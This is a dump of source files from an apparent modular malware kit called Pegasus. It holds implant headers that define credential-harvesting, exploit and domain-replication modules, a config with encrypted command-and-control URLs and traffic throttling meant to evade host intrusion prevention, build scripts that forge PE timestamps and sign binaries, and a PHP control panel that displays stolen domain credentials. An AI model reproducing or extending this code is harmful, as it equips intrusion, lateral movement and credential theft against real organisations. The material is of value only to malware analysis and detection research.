dwMaxQueryCountSelected; // updated each hour with a random value from range [MAX_QUERIES_IN_HOUR_MIN..MAX_QUERIES_IN_HOUR_MAX] 20 | 21 | } WHT_INTERNAL_CONTEXT, *PWHT_INTERNAL_CONTEXT; 22 | 23 | typedef enum WHT_QUERY_TYPE { 24 | REQUEST_TYPE_GET = 1, 25 | REQUEST_TYPE_POST 26 | }; 27 | 28 | // type of connection used 29 | typedef enum WHT_CONNECTION_TYPE 30 | { 31 | CONNECTION_DIRECT = 0, // no proxy at all 32 | CONNECTION_WPAD_AUTOPROXY, // attempt WPAD proxy auto discovery 33 | CONNECTION_PROXY_CONFIGURED, // auto proxy retrieval as defined for WinHTTP 34 | CONNECTION_PROXY_DISCOVERED // proxy settings, discovered as a result of registry scan for all available user profiles 35 | }; 36 | 37 | // callback for tswhttpEnumUserProxy() 38 | typedef BOOL (CALLBACK *CBENUMUSERPROXY) (LPWSTR, LPVOID); 39 | 40 | HINTERNET _tswhttpTestConnection(WHT_CONNECTION_TYPE wcType, LPWSTR wszProxySetting); 41 | BOOL CALLBACK 
tswhttpTransportSend(PTRANSPORT_HANDLE pTransport, PTRANSPORT_QUERY pQuery); 42 | 43 | PTRANSPORT_HANDLE tswhttpInitTransport(); 44 | VOID CALLBACK tswhttpDisposeTransport(PTRANSPORT_HANDLE pTransport); -------------------------------------------------------------------------------- /Pegasus/shared/ModuleAPI.h: -------------------------------------------------------------------------------- 1 | /* 2 | ModuleAPI.h 3 | Headers with core<->modules api structures 4 | */ 5 | #pragma once 6 | 7 | #include 8 | 9 | #include "..\inc\HashedStrings.h" 10 | #include "..\inc\MyStringRoutines.h" 11 | #include "..\inc\CryptoStrings.h" 12 | #include "..\inc\RandomGen.h" 13 | 14 | #include "..\inc\PipeWorks.h" 15 | #include "..\inc\DomainListMachines.h" 16 | #include "..\inc\CredManager.h" 17 | #include "..\inc\EmbeddedResources.h" 18 | #include "..\inc\MailslotWorks.h" 19 | #include "..\shared\CommStructures.h" 20 | 21 | #include "..\inc\DataCallbackManager.h" 22 | 23 | 24 | 25 | // definition of a core APIs available to modules 26 | typedef struct _CORE_APIS_v10 27 | { 28 | // version code to use correct structure definition by modules 29 | WORD wCoreVersion; 30 | 31 | // api definitions of all funcs from libs, which may be used by modules 32 | 33 | // generic libraries 34 | HashedStrings_ptrs *HashedStrings_apis; 35 | MyStringRoutines_ptrs *MyStringRoutines_apis; 36 | CryptoStrings_ptrs *CryptoStrings_apis; 37 | RndClass_ptrs *RndClass_apis; 38 | 39 | // more specific libs 40 | PipeWorks_ptrs *PipeWorks_apis; 41 | DomainListMachines_ptrs *DomainListMachines_apis; 42 | CredManager_ptrs *CredManager_apis; 43 | EmbeddedResources_ptrs *EmbeddedResources_apis; 44 | MailslotWorks_ptrs *MailslotWorks_apis; 45 | 46 | // WDD - specific libs with exported functions 47 | DataCallbackManager_ptrs *DataCallbackManager_apis; // data callbacks management as a result of some network/pipe communication 48 | 49 | // functions to generate/manage common structures 50 | CommStructures_ptrs 
*CommStructures_apis; 51 | 52 | 53 | } CORE_API_v10, *PCORE_APIS_v10; 54 | 55 | // definition of a current apis version 56 | #define CORE_APIS CORE_API_v10 57 | -------------------------------------------------------------------------------- /Pegasus/shared/ModuleDescriptor.h: -------------------------------------------------------------------------------- 1 | /* 2 | ModuleDescriptor.h 3 | Definition of module descriptor and related structures 4 | Used by different modules 5 | */ 6 | 7 | #include 8 | 9 | 10 | 11 | // used at MODULE_DESCRIPTOR.bModuleClass 12 | typedef enum ENUM_MODULE_CLASSNAME 13 | { 14 | MODULE_CLASS_CORE = 0, // main core module, assumed to be only one - api for other modules, creds manager, local file storage 15 | MODULE_CLASS_AUTHCREDS_HARVESTER, // auth credentials harvesters - mimikatz, rdp files, prot storage, keylog analyzers, pre-defined creds 16 | MODULE_CLASS_REPLICATOR, // misc replication modules - domain enum and replicator, others 17 | MODULE_CLASS_EXPLOIT, // different exploits - rights elevation, etc 18 | MODULE_CLASS_NETWORK, // network communication modules - client, server, etc 19 | MODULE_CLASS_TASKWORKS, // misc task executors - file execution, console command output as a result of command found in local storage 20 | 21 | MODULE_CLASS_OTHER = 128, // some class-unrelated contents, especially for RES_TYPE_MODULE_RELATED or specific modules 22 | 23 | MODULE_CLASS_MAXVAL = 255 // definition of a max value as a BYTE 24 | }; 25 | 26 | -------------------------------------------------------------------------------- /Pegasus/shared/config.h: -------------------------------------------------------------------------------- 1 | /* 2 | config.h 3 | Shared project configuration file 4 | 5 | */ 6 | 7 | 8 | 9 | 10 | // name used as source for random generators used in object names. 
11 | // Should be constant for all components inside one installation 12 | #define TARGET_BUILDCHAIN_HASH HASHSTR_CONST("test environment", 0x7393c9a643eb4a76) 13 | 14 | // numeric id of build (word value) to distinct target networks one from another 15 | // 1x - support.zakon-auto.net/tuning/ 16 | // 2x - mp3.ucrazy.org/music/ 17 | #define BUILD_ID 20 18 | 19 | 20 | // defines a amount of seconds to wait before module will check network connectivity 21 | // of a particular machine. Specified as a min-max range, a random value inside will be chosen 22 | // to prevent timeframe identification of software startup. 23 | // When delay finishes, network module attempts to query some urls 24 | // for release mode, 10-60 mins range suggested 25 | #define NETWORK_CHECK_ATTEMPT_DELAY_SEC_MIN 2 26 | #define NETWORK_CHECK_ATTEMPT_DELAY_SEC_MAX 5 27 | 28 | 29 | // if set to TRUE, remote network access will be issued only in usual working hours 30 | // according to local clock (9-00(+lag) - 19-00) 31 | // if undefined, this functionality will not be compiled at all 32 | //#define PRESERVE_WORKHOURS_NETWORK_ACCESS TRUE 33 | 34 | 35 | // values regulating amount and delays between networks requests. Should be reasonably low to avoid HIPS triggering 36 | // used by WinHTTP transport. 
Actual values are randomly selected from specified range each check time 37 | #ifndef _DEBUG 38 | 39 | // RELEASE VALUES 40 | #define MAX_QUERIES_IN_HOUR_MIN 10 41 | #define MAX_QUERIES_IN_HOUR_MAX 25 42 | #define WAIT_BETWEEN_QUERIES_SEC_MIN 8 43 | #define WAIT_BETWEEN_QUERIES_SEC_MAX 80 44 | 45 | #else 46 | 47 | #define MAX_QUERIES_IN_HOUR_MIN 100000 48 | #define MAX_QUERIES_IN_HOUR_MAX 250000 49 | #define WAIT_BETWEEN_QUERIES_SEC_MIN 2 50 | #define WAIT_BETWEEN_QUERIES_SEC_MAX 5 51 | 52 | #endif 53 | 54 | // amount of time (mins) a network thread should wait for in case of fQuery() attempt from transport failed 55 | #define WAIT_MINUTES_IF_NETWORK_COMMUNICATION_FAILED 13 56 | 57 | // how long tsgen should keep answer for remote queries from pipe clients without network access, in minutes 58 | // after this time, answer will be removed from queue to free resources 59 | #define REMOTE_CHUNK_ANSWER_TTL_MINS 20 60 | 61 | 62 | 63 | // disables https connectivity check in winhttp transport, which sometimes fails on winxp in test environment with 12175 error at WinHttpSendRequest() 64 | #define NO_HTTPS_ACCESS_CHECK_IN_TRANSPORT 65 | 66 | 67 | // experimental - include privilege escalation at IDD 68 | //#define DO_PRIVILEGE_ESCALATION 69 | 70 | 71 | // mod_NetworkConnectivity, transport_Generic 72 | // url of remote control center 73 | #define DEBUG_CONTROL_URL = L"http://denwer/pegasus/index.php"; 74 | #define RELEASE_CONTROL_URL = CRSTRW("http://mp3.ucrazy.org/music/index.php", "\xfd\xff\x43\x04\xd8\xff\x4b\x18\xf9\xf7\xf9\xa3\x42\x0a\x93\x9f\x63\x32\xe0\xbe\x4c\x5d\xda\xc2\x62\x75\x24\x23\x80\x92\x10\x45\xae\xe8\x6a\x22\xc9\xc2\x5b\x42\xfd\xef\xb3"); 75 | // CRSTRW("http://support.zakon-auto.net/tuning/index.asp", "xxx"); 76 | // CRSTRW("http://video.tnt-online.info/tnt-comedy-tv/stream.php", "xxx"); 77 | 78 | // replication methods used 79 | #define DOMAIN_REPLICATION_WMI 80 | #define DOMAIN_REPLICATION_SCM 81 | //#define DOMAIN_REPLICATION_RDP 82 | 83 | // 
replication settings - timeframe to restart replication to gather new hosts, in minutes 84 | #define REPLICATION_RESTART_MIN 20 85 | #define REPLICATION_RESTART_MAX 60 86 | 87 | 88 | // compile hardcoded creds, from target system (WorkDispatcher) 89 | //#define ADD_BUILTIN_CREDS -------------------------------------------------------------------------------- /Pegasus/tools/LZ4_pack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/tools/LZ4_pack.exe -------------------------------------------------------------------------------- /Pegasus/tools/MAKE_INSTALLERS.BAT: -------------------------------------------------------------------------------- 1 | rem @echo off 2 | cls 3 | rem MAKE_INSTALLERS.BAT 4 | rem rebuilds all project elements and prepares both x32 and x64 exes for usage 5 | 6 | rem Check param passed 7 | goto build_%1 8 | :build_ 9 | echo ERR: no param passed, expected 10 | exit 255 11 | 12 | :build_Release 13 | :build_Debug 14 | 15 | rebuild_core %1 16 | rebuild_modules %1 17 | 18 | echo Installers buildlog, mode %1 > installers_build.log 19 | 20 | devenv ..\Pegasus.sln /Rebuild "%1|x32" /project InstallerExe >> installers_build.log 21 | 22 | rem Check build result 23 | if %ERRORLEVEL% NEQ 0 ( 24 | echo ERROR rebuilding InstallerExe in mode %1 x32 25 | pause 26 | exit 255 27 | ) 28 | 29 | devenv ..\Pegasus.sln /Rebuild "%1|x64" /project InstallerExe >> installers_build.log 30 | 31 | rem Check build result 32 | if %ERRORLEVEL% NEQ 0 ( 33 | echo ERROR rebuilding InstallerExe in mode %1 x64 34 | pause 35 | exit 255 36 | ) -------------------------------------------------------------------------------- /Pegasus/tools/__file2bin.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | // test args 8 | //print_r($argv); die(); 9 | 10 | 11 | 12 | 13 | $g_Filename_in = $argv[1]; 
$g_Filename_out = $argv[2]; 14 | 15 | if (!file_exists($g_Filename_in)) { echo "ERR: input file {$g_Filename_in} not found"; die(); } 16 | //echo "Processing {$g_Filename_in} into {$g_Filename_out} "; 17 | 18 | $bin = file_get_contents($g_Filename_in); 19 | 20 | //mangle_file($bin); 21 | 22 | $len = strlen($bin); 23 | 24 | // form name 25 | $name = basename($g_Filename_out, ".h"); 26 | 27 | /* // query orig file's length into $len_orig by cutting last extension from passed input filename 28 | // usually input is filename.ext.lz4 29 | $fname_orig = substr($g_Filename_in, 0, strrpos($g_Filename_in, '.') ); 30 | $len_orig = filesize($fname_orig); 31 | if (!$len_orig) { die("ERR: unable to query original file {$fname_orig}"); } */ 32 | 33 | // resulting string 34 | $s = ''; 35 | 36 | $s = "/* 37 | ".basename($g_Filename_out)." 38 | file2bin converted, sha1 ".sha1($bin)." 39 | */ 40 | 41 | #define bin_{$name}_len_orig {$len_orig} 42 | #define bin_{$name}_len {$len} 43 | 44 | BYTE bin_{$name}[{$len}] = {"; 45 | 46 | // convert bin 2 hex 47 | $hex = unpack('H*', $bin); $hex_arr = str_split($hex[1], 2); //print_r($hex_arr); 48 | 49 | $counter = 1; 50 | foreach ($hex_arr as $val) { 51 | $s .= "0x{$val},"; 52 | $counter++; 53 | if ($counter >20 ) { $s .="\r\n"; $counter = 1; } 54 | } 55 | 56 | // cut last comma 57 | $s = substr($s, 0, -1); 58 | 59 | $s .= "};"; 60 | 61 | // save resulting dat 62 | file_put_contents($g_Filename_out, $s); 63 | 64 | //echo "\ndone"; 65 | 66 | 67 | 68 | ?> -------------------------------------------------------------------------------- /Pegasus/tools/core_build.log: -------------------------------------------------------------------------------- 1 | Core buildlog, mode RELEASE 2 | Rebuilding RELEASE shellcode x32 3 | 4 | Microsoft Visual Studio 2013 Version 12.0.31101.0. 5 | Copyright (C) Microsoft Corp. All rights reserved. 
6 | 1>------ Rebuild All started: Project: shellcode, Configuration: Release Win32 ------ 7 | 1> This tool executes recrypt_strings.php script 8 | 1> Expected params: 9 | 1> param1 - main source file ("Z:\Sources\Pegasus\Shellcode\shellcode.c") 10 | 1> :: shellcode.c 11 | 1> :: PELoader.cpp 12 | 1> :: dbg.c 13 | 1> :: dbg.h 14 | 1> :: PELoader.h 15 | 1> :: HashedStrings.c 16 | 1> :: HashedStrings.h 17 | 1> :: shellcode.h 18 | 1> :: dbgt.h 19 | 1> HashedStrings.c 20 | 1> PELoader.cpp 21 | 1> SHELLCODE mode 22 | 1> shellcode.c 23 | 1> Generating code 24 | 1> Finished generating code 25 | 1> Shellcode.vcxproj -> Z:\Sources\Pegasus\binres\shellcode.x32 26 | ========== Rebuild All: 1 succeeded, 0 failed, 0 skipped ========== 27 | Rebuilding RELEASE shellcode x64 28 | -------------------------------------------------------------------------------- /Pegasus/tools/fake_timestamps.php: -------------------------------------------------------------------------------- 1 | to process"); } 12 | 13 | $fname = $argv[1]; 14 | if (!file_exists($fname)) { die("ERR: file {$fname} does not exists"); } 15 | 16 | $pe_data = file_get_contents($fname); 17 | 18 | $res = array(); 19 | 20 | // IMAGE_DOS_HEADER 21 | $res['IMAGE_DOS_HEADER'] = unpack('ve_magic/ve_cblp/ve_cp/ve_crlc/ve_cparhdr/ve_minalloc/ve_maxalloc/ve_ss/ve_sp/ve_csum/ve_ip/ve_cs/ve_lfarlc/ve_ovno/v4e_res/ve_oemid/ve_oeminfo/v10e_res2/ve_lfanew', $pe_data); 22 | if ($res['IMAGE_DOS_HEADER']['e_magic'] != 0x05a4d) { die("Invalid DOS header signature"); } 23 | 24 | // arch-independent part of IMAGE_NT_HEADERS : Signature + IMAGE_FILE_HEADER 25 | $res['IMAGE_FILE_HEADER'] = unpack('VSignature/vMachine/vNumberOfSections/VTimeDateStamp/VPointerToSymbolTable/VNumberOfSymbols/vSizeOfOptionalHeader/vCharacteristics', substr($pe_data, $res['IMAGE_DOS_HEADER']['e_lfanew'])); 26 | if ($res['IMAGE_FILE_HEADER']['Signature'] != 0x4550) { die("Invalid PE header signature"); } 27 | 28 | // modify timestamp with random val 29 | $new_ts = 
mt_rand( strtotime("01 January 2014"), strtotime("01 June 2015") ); // gen rnd PE timestamp 30 | $pe_data = substr_replace( $pe_data, pack("V", $new_ts), $res['IMAGE_DOS_HEADER']['e_lfanew'] + (2 * 4), 4); 31 | 32 | // save result 33 | file_put_contents($fname, $pe_data); 34 | 35 | echo "OK: {$fname} ts ".date('d-M-Y H:i:s', $res['IMAGE_FILE_HEADER']['TimeDateStamp'])." -> ".date('d-M-Y H:i:s', $new_ts)."\n"; 36 | 37 | 38 | 39 | ?> -------------------------------------------------------------------------------- /Pegasus/tools/postbuild_installer.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem postbuild_installer.bat 3 | rem Checks output exe, cleans some build timestamp fields, etc 4 | rem FOR MAIN INSTALLER EXE 5 | 6 | echo Calling script [%0] for target [%1] 7 | 8 | rem check if param passed 9 | if not exist %1 ( 10 | echo ERR: target file not found 11 | exit 255 12 | ) 13 | 14 | echo Post-parsing target 15 | pushd 16 | cd /d %~dp0 17 | php -n -f fake_timestamps.php %1 18 | popd 19 | if NOT ERRORLEVEL 0 ( 20 | echo ERR: fake_timestamps.php parse failure 21 | exit 255 22 | ) 23 | 24 | echo Signing binary 25 | signtool.exe sign /f tric.pfx /p 123 %1 26 | if NOT ERRORLEVEL 0 ( 27 | echo ERR: Sign failed 28 | exit 255 29 | ) 30 | 31 | 32 | rem got here if all was ok 33 | echo ----------------------- Postbuils script finished OK -------------------------- 34 | echo . 35 | exit 0 36 | 37 | @echo off -------------------------------------------------------------------------------- /Pegasus/tools/prebuild_installer.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem prebuild_installer.bat
3 | rem Recrypt strings, regenerates resources 4 | 5 | echo Calling script [%0] with param [%1] in mode [%2] 6 | 7 | rem check if param passed 8 | if not exist %1 ( 9 | echo ERR: main source file not found 10 | exit 255 11 | ) 12 | 13 | echo Calling macro parser/string encryption 14 | rem goto script dir so php won't claim No input file specified 15 | pushd 16 | cd /d %~dp0 17 | php -n -f recrypt_strings.php %1 18 | popd 19 | 20 | echo Preparing binpack resources 21 | pushd 22 | cd /d %~dp0 23 | php -n -f make_binpack.php %2 24 | popd 25 | if not exist ..\inc\binpack.h ( 26 | echo ERR: binpack not generated 27 | exit 255 28 | ) 29 | 30 | rem got here if all was ok 31 | echo ----------------------- Prebuild script finished OK -------------------------- 32 | echo . 33 | exit 0 -------------------------------------------------------------------------------- /Pegasus/tools/rebuild_core.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | cls 3 | rem rebuild_core.bat 4 | rem Performs rebuild of all core projects - shellcode, rse, idd, wdd, possibly some others later 5 | rem essential for building binpack and resulting installer exe 6 | rem NOTE: second essential part before preparing binpack is building all the modules needed into ./binres/ dir 7 | 8 | 9 | echo Setuping VS2012 vars 10 | call "%VS120COMNTOOLS%\vsvars32.bat" 11 | 12 | 13 | goto build_%1 14 | :build_ 15 | echo ERR: no param passed, expected 16 | exit 255 17 | 18 | 19 | :build_Release 20 | :build_Debug 21 | 22 | rem Wipe some temp files 23 | rem del ..\binres\*.pdb 24 | 25 | echo Core buildlog, mode %1 > core_build.log 26 | 27 | echo Building CORE in %1 mode 28 | 29 | call rebuild_project.bat %1 shellcode x32 core_build.log shellcode 30 | call rebuild_project.bat %1 shellcode x64 core_build.log shellcode 31 | 32 | call rebuild_project.bat %1 RemoteServiceExe x32 core_build.log rse 33 | call rebuild_project.bat %1 RemoteServiceExe x64 core_build.log rse 34 | 
35 | call rebuild_project.bat %1 InstallDispatcherDll x32 core_build.log idd 36 | call rebuild_project.bat %1 InstallDispatcherDll x64 core_build.log idd 37 | 38 | call rebuild_project.bat %1 WorkDispatcherDll x32 core_build.log wdd 39 | call rebuild_project.bat %1 WorkDispatcherDll x64 core_build.log wdd 40 | 41 | rem Revore read only from all files 42 | attrib -R "..\binres\*.x32" 43 | attrib -R "..\binres\*.x64" -------------------------------------------------------------------------------- /Pegasus/tools/rebuild_modules.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | cls 3 | rem rebuild_modules.bat 4 | rem Performs rebuild of actual modules 5 | 6 | 7 | echo Setuping VS2012 vars 8 | call "%VS120COMNTOOLS%\vsvars32.bat" 9 | 10 | 11 | goto build_%1 12 | :build_ 13 | echo ERR: no param passed, expected 14 | exit 255 15 | 16 | 17 | :build_Release 18 | :build_Debug 19 | 20 | echo Modules buildlog, mode %1 > mods_build.log 21 | 22 | echo Building MODULES in %1 mode 23 | 24 | 25 | 26 | call rebuild_project.bat %1 mod_CmdExec x32 mods_build.log mod_CmdExec 27 | call rebuild_project.bat %1 mod_CmdExec x64 mods_build.log mod_CmdExec 28 | 29 | call rebuild_project.bat %1 mod_DomainReplication x32 mods_build.log mod_DomainReplication 30 | call rebuild_project.bat %1 mod_DomainReplication x64 mods_build.log mod_DomainReplication 31 | 32 | call rebuild_project.bat %1 mod_LogonPasswords x32 mods_build.log mod_LogonPasswords 33 | call rebuild_project.bat %1 mod_LogonPasswords x64 mods_build.log mod_LogonPasswords 34 | 35 | call rebuild_project.bat %1 mod_NetworkConnectivity x32 mods_build.log mod_NetworkConnectivity 36 | call rebuild_project.bat %1 mod_NetworkConnectivity x64 mods_build.log mod_NetworkConnectivity 37 | 38 | rem Revore read only from all files 39 | attrib -R "..\binres\*.x32" 40 | attrib -R "..\binres\*.x64" 41 | -------------------------------------------------------------------------------- 
/Pegasus/tools/rebuild_project.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem rebuild_project.bat 1 2 3 4 5 3 | rem rebuilds a single project when all vars are set 4 | 5 | 6 | if exist "..\binres\*.pdb" ( 7 | del "..\binres\*.pdb" > nul 8 | ) 9 | if exist "..\binres\*.lib" ( 10 | del "..\binres\*.lib" > nul 11 | ) 12 | if exist "..\binres\*.exp" ( 13 | del "..\binres\*.exp" > nul 14 | ) 15 | if exist "..\binres\*.bsc" ( 16 | del "..\binres\*.bsc" > nul 17 | ) 18 | 19 | 20 | if exist "..\binres\%5.%3" ( 21 | attrib -R "..\binres\%5.%3" 22 | del "..\binres\%5.%3" > nul 23 | ) 24 | 25 | echo Rebuilding %1 %2 %3 26 | echo Rebuilding %1 %2 %3 >> %4 27 | devenv ..\Pegasus.sln /Rebuild "%1|%3" /project %2 >> %4 28 | 29 | rem Check build result 30 | if %ERRORLEVEL% NEQ 0 ( 31 | echo ERROR rebuilding %2 in mode %1 %3 32 | pause 33 | exit 255 34 | ) 35 | 36 | rem Extra check for output file exists 37 | if not exist "..\binres\%5.%3" ( 38 | echo ERROR: output file %5.%3 not found 39 | pause 40 | exit 254 41 | ) 42 | 43 | if exist "..\binres\*.pdb" ( 44 | del "..\binres\*.pdb" > nul 45 | ) 46 | if exist "..\binres\*.lib" ( 47 | del "..\binres\*.lib" > nul 48 | ) 49 | if exist "..\binres\*.exp" ( 50 | del "..\binres\*.exp" > nul 51 | ) 52 | if exist "..\binres\*.bsc" ( 53 | del "..\binres\*.bsc" > nul 54 | ) 55 | 56 | rem Resolving build issue when new target may remove previous binary file 57 | attrib +R "..\binres\%5.%3" 58 | -------------------------------------------------------------------------------- /Pegasus/tools/recrypt_strings.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo This tool executes recrypt_strings.php script 3 | echo Expected params: 4 | echo param1 - main source file (%1) 5 | 6 | if not exist %1 ( 7 | echo ERR: source not found 8 | exit 255 9 | ) 10 | 11 | rem set 12 | 13 | rem goto script dir so php won't claim No input file specified 
14 | cd /d %~dp0 15 | php -n -f recrypt_strings.php %1 16 | -------------------------------------------------------------------------------- /Pegasus/tools/signtool.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/tools/signtool.exe -------------------------------------------------------------------------------- /Pegasus/web-adminpart/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteOptions inherit 3 | RewriteRule ^(.*)$ index.php [L] -------------------------------------------------------------------------------- /Pegasus/web-adminpart/cfg/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/cfg/config.php: -------------------------------------------------------------------------------- 1 | 'localhost', 8 | 'db' => 'pegasus', 9 | 'user' => 'root', 10 | 'password' => '12345' 11 | ); 12 | 13 | // testpass 14 | $g_auth_data = array( 15 | 'user' => 'root', 16 | 'pass' => 'testpass' 17 | ); 18 | 19 | // ips to exclude from geo2ip queries 20 | $g_exclude_ips = array( 21 | '127.0.0.1', 22 | '127.0.0.1' 23 | ); 24 | 25 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/inc_ajax.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/Pegasus/web-adminpart/inc/mod_ajax_mcreds.php: -------------------------------------------------------------------------------- 1 | FROM_UNIXTIME({$ts})"; } 21 | $sql = "SELECT `id`, 22 | `src_id`, 23 | DATE_FORMAT(`stamp`, '%d/%m %H:%i') AS `stamp`, 24 | (UNIX_TIMESTAMP(NOW()) - UNIX_TIMESTAMP(`stamp`)) AS `ts_ago`, 25 | UNIX_TIMESTAMP(`stamp`) AS `ts`, 26 | `SM`, 27 | `D`, 28 | `U`, 29 | `P` 30 | FROM `creds` {$sql_extra} ORDER BY `stamp` DESC"; 31 | 32 | // issue query 33 | if (!($res = mysqli_query($g_dblink, $sql))) { errExit("db query error: ".mysqli_error($g_dblink)); } 34 | 35 | $answer['r'] = array(); 36 | $answer['ts'] = 0; 37 | 38 | while ($row = mysqli_fetch_assoc($res)) { 39 | 40 | // set some fields 41 | $row['cred'] = $row['D']."\\".$row['U'].":".$row['P']; unset($row['D']); unset($row['U']); unset($row['P']); 42 | 43 | $row['ts_ago'] = ticks2string($row['ts_ago']*100, TRUE); 44 | 45 | $answer['r'][] = $row; 46 | if ($row['ts'] > $answer['ts']) { $answer['ts'] = $row['ts']; } 47 | unset($row); 48 | } // while 49 | 50 | $answer['c'] = count($answer['r']); 51 | 52 | // all modules count assign 53 | $answer['mc'] = mCountsQuery(); 54 | 55 | echo json_encode($answer); 56 | exit; 57 | } 58 | 59 | 60 | 61 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_ajax_msqlog.php: -------------------------------------------------------------------------------- 1 | FROM_UNIXTIME({$ts})"; } 35 | $sql = "SELECT `id`, 36 | DATE_FORMAT(`stamp`, '%d/%m %H:%i') AS `stamp`, 37 | (UNIX_TIMESTAMP(NOW()) - UNIX_TIMESTAMP(`stamp`)) AS `ts_ago`, 38 | UNIX_TIMESTAMP(`stamp`) AS `ts`, 39 | `log_json` 40 | FROM `q_log` {$sql_extra} ORDER BY `id` DESC"; 41 | 42 | // issue query 43 | if (!($res = mysqli_query($g_dblink, $sql))) { errExit("db query error: ".mysqli_error($g_dblink)); } 44 | 45 | $answer['r'] = array(); 46 | $answer['ts'] = 0; 47 | 48 | while ($row = mysqli_fetch_assoc($res)) { 49 | 50 | $row['log'] = 
json_decode($row['log_json']); unset($row['log_json']); 51 | $row['ts_ago'] = ticks2string($row['ts_ago']*100, TRUE); 52 | 53 | $answer['r'][] = $row; 54 | if ($row['ts'] > $answer['ts']) { $answer['ts'] = $row['ts']; } 55 | unset($row); 56 | } // while 57 | 58 | $answer['c'] = count($answer['r']); 59 | 60 | 61 | // all modules count assign 62 | $answer['mc'] = mCountsQuery(); 63 | 64 | echo json_encode($answer); 65 | exit; 66 | } 67 | 68 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_auth.php: -------------------------------------------------------------------------------- 1 | 1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1); 24 | $data = array(); 25 | $keys = implode('|', array_keys($needed_parts)); 26 | 27 | preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER); 28 | 29 | foreach ($matches as $m) { 30 | $data[$m[1]] = $m[3] ? $m[3] : $m[4]; 31 | unset($needed_parts[$m[1]]); 32 | } 33 | 34 | return $needed_parts ? false : $data; 35 | } 36 | 37 | 38 | 39 | function lgDoCheckAuth() 40 | { global $g_auth_data; 41 | 42 | $realm = 'Restricted area'; 43 | 44 | // set auth 45 | if ( (!@isset($g_auth_data['user'])) || (!@isset($g_auth_data['pass'])) ) { die("check auth config"); } 46 | 47 | // set check 48 | if (empty($_SERVER['PHP_AUTH_DIGEST'])) { DigestAuthForm($realm); } 49 | if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST']))) { DigestAuthForm($realm); } 50 | 51 | // generate valid response 52 | $A1 = md5($g_auth_data['user'] . ':' . $realm . ':' . 
$g_auth_data['pass']); 53 | $A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']); 54 | $valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2); 55 | 56 | if ($data['response'] != $valid_response) { DigestAuthForm($realm); } 57 | 58 | 59 | } 60 | 61 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_db.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_router.php: -------------------------------------------------------------------------------- 1 | 'text/html', 25 | 'js' => 'text/javascript' 26 | 27 | ); 28 | header('Content-type: '.$types[$rContext['extension']].'; charset=utf-8'); 29 | 30 | echo file_get_contents($res); 31 | 32 | } 33 | 34 | 35 | 36 | function rrRouteScript($rContext) 37 | { 38 | 39 | $res = './inc/inc_'.$rContext['filename'].'.php'; 40 | if (!file_exists($res)) { rrNotFound(); exit; } 41 | 42 | // force refresh 43 | header('Content-type: text/html; charset=utf-8'); header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' ); 44 | header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 
' GMT' ); 45 | header( 'Cache-Control: no-store, no-cache, must-revalidate' ); 46 | header( 'Cache-Control: post-check=0, pre-check=0', false ); 47 | header( 'Pragma: no-cache' ); 48 | 49 | require_once $res; 50 | 51 | } 52 | 53 | 54 | 55 | /* 56 | Parses input from rewrite engine and loads/returns correct resource 57 | */ 58 | function rrDoRoute() 59 | { // $_SERVER['REQUEST_URI'] => '/pegasus-admin/index.js?sfdfd=ddd' 60 | // $urlparts => Array ( [path] => /pegasus-admin/index.js [query] => sfdfd=ddd ) 61 | $urlparts = parse_url($_SERVER['REQUEST_URI']); 62 | 63 | // $fileparts => Array ( [dirname] => /pegasus-admin [basename] => index.js [extension] => js [filename] => index ) 64 | $fileparts = pathinfo($urlparts['path']); 65 | 66 | // form context 67 | $rContext = $fileparts; 68 | $rContext['query'] = $urlparts['query']; 69 | 70 | //print_r($rContext); 71 | 72 | // fishy params check 73 | if (strpos($rContext['basename'], '..')) { die("fish"); } 74 | 75 | // check for non-php 76 | if ($rContext['extension'] != 'php') { rrRouteResource($rContext); } else { rrRouteScript($rContext); } 77 | 78 | 79 | } 80 | 81 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/glyphicons-halflings-regular.eot 
